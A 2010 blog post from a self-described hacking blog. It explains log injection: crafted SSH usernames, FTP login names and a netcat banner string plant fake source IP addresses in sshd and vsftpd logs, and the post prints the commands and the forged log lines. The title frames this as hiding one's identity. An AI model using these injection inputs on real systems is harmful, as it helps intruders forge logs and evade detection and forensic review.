Welcome to my site. Please CLICK HERE to give your opinions regarding this new look of "PCTipsbyAnu". Thanks for visiting.

Friday, October 8, 2010

Browse » Home » , , , , » LINUX : How to inject remote log injection for hiding your ID?

LINUX : How to inject remote log injection for hiding your ID?

Friday, October 08, 2010 Anu
 

We all know that we should nevertrust user input, specially when talking about web development, but we seemedto have forgotten about it when dealing with logs.

The rule should always be: ANYuser input that goes into a log SHOULD NOT be trusted! 
Why do I say that?Let’s look at some ssh logs to start.
When you miss a password, SSH logsthe following (the second and third lines happen when you provide an invaliduser name):
Jun 2 14:49:00 pctipsbyanu sshd[5862]:Failed password for root from 192.168.10.5 port 34780 ssh2
Jun 2 14:49:42 pctipsbyanu sshd[5866]: Invalid user invuser from 192.168.10.5
Jun 2 14:49:46 pctipsbyanu sshd[5866]: Failed password for invalid user invuserfrom 192.168.10.5 port 34786 ssh2

Note that the SSH logs have the username and IP address related to the connection. BUT, the user name isprovided by the USER! 

What if we provide the following username:
$ ssh “myfakeuserfrom 10.1.1.1 port 123 ssh2 “@192.168.5.1
What would the logs look like?

Jun 2 14:54:00 pctipsbyanu sshd[5870]:Invalid user myfakeuser from 10.1.1.1 port 123 ssh2 from 192.168.10.5
Jun 2 14:54:03 pctipsbyanu sshd[5870]: Failed password for invalid user myfakeuserfrom 10.1.1.1 port 123 ssh2 from 192.168.10.5 port 34813 ssh2
What about an FTP log? 
(we usevsftpd as an example, but it applies to every application) 

Take a look at thelogs when we try to modify the user name:
root@slacker:~# ftp 192.168.3.4
220 Welcome to labs ossec candy FTP service.
Name (192.168.2.3:root): myuser
... 

root@slacker:~# ftp 192.168.3.4
220 Welcome to labs ossec candy FTP service.
Name (192.168.2.3: root): lala] FAIL LOGIN: Client “2.3.4.54″
..
(looking at the logs)
 
Mon Jun 2 21:05:30 2007 [pid 1448] [myuser] FAIL LOGIN: Client“192.168.3.1″
Mon Jun 2 21:06:02 2007 [pid 1452]  [lala] FAIL LOGIN: Client “2.3.4.54″] FAIL LOGIN: Client “192.168.3.1″
We all know SQLinjection, and the idea here is not different. We are just passingthe user name in a way that would trick a log analysis tool, making it thinkthat the source ip of the connection is not what it really is.

Other very interesting thing that wewill use later in here, is regarding how SSH logs invalid protocols:
root@slacker:~# nc 192.168.3.4 22
SSH-1.99-OpenSSH_4.2
hi me
Protocol mismatch.
(looking at the logs):
Jun 2 21:27:37 slacker sshd[1457]:Bad protocol version identification ‘hi me‘ from 192.168.3.1
Can you see the provided user stringon that log? 

The question remaining is: How well your log analysis tool handlethese injections?

Keep wait n watch for my next post on that topic... 

Thanks....
Posted in , , , ,
You can leave a response, or trackback from your own site.

About 'Anu': My name is 'Anu' also Known as 'ANU 007 TIGER' .I'm administrator of 'PC Tips by Anu' blog .This blog was opened for sharing contents about hacking n cracking.
Thanks YAHOO OR GMAIL

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)
 
Back to Top